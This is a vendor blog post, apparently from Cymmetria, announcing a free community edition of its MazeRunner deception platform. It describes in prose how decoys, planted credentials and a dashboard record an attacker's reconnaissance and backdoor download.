The power of deception technology as an extremely viable solution to the most advanced cyber threats is unquestionable (to us at Cymmetria, at least). We are also huge supporters of the cybersecurity community that we call home and believe strongly in giving back to that community. This is why we are excited to raise the curtain on our solution and provide free access to those looking to explore its benefits. The MazeRunner Community Edition (same one that caught the Patchwork APT as detailed in our report last week) is now available for free to anyone wishing to use it for research for personal use.
Deception technology is quickly gaining in popularity due to the increasing need for an effective solution to stop and deter threat actors. MazeRunner leverages virtualization technology to automate the creation and management of deception campaigns, ultimately creating unfriendly environments for attackers. Running tools or exploits on the wrong target means the end of the attack as attackers are fingerprinted and signatures of their attack are generated and distributed throughout the organization.
Defender screen - showing how a breadcrumb is created. This will be placed on an endpoint as bait for an attacker in his reconnaissance phase.
Attacker screen - showing the same breadcrumb seen by the attacker running a data gathering tool on a compromised machine. Note in the bottom he steals the credentials planted by Cymmetria.
MazeRunner helps enterprises and cybersecurity teams defend valuable organizational assets from ever changing cyber threats. MazeRunner addresses the need to quickly identify and stop advanced threat actors from operating inside the organizational perimeter, regardless of whether the attacker is lying dormant and gathering information, or actively performing lateral movement.
Deception dashboard - showing how an attacker penetrated the executive team, moved onto HR services and towards a file server.
The deception dashboard also reflects the deception campaign, a story crafted to target advanced attackers. It shows management workstations, development servers and HR workstations. These serve as the entrance point for the attacker to harvest credentials and other information that will lead him to decoys.
Code execution - showing the information gathered by the decoy (or honeypot), as an attacker was working on it after he followed a breadcrumb. It shows (from bottom towards the top)
Low command: the attacker runs wget, a command that lets him download an external file to the compromised server.
Middle command: takes the downloaded file and changes it to be executable.
Top command: runs the downloaded backdoor.
Chronological view of the attack from the previous screenshot.
The new community edition of MazeRunner will be publicly available for private initiatives and research endeavors at no cost or commitment to purchase. The platform is fully customizable and integrates seamlessly with existing IT and security tools, allowing users to implement deception elements across the network. It is flexible and does not burden existing organizational systems, nor requires a lot of human capital to operate.
We truly hope you enjoy the platform and please do give us your feedback.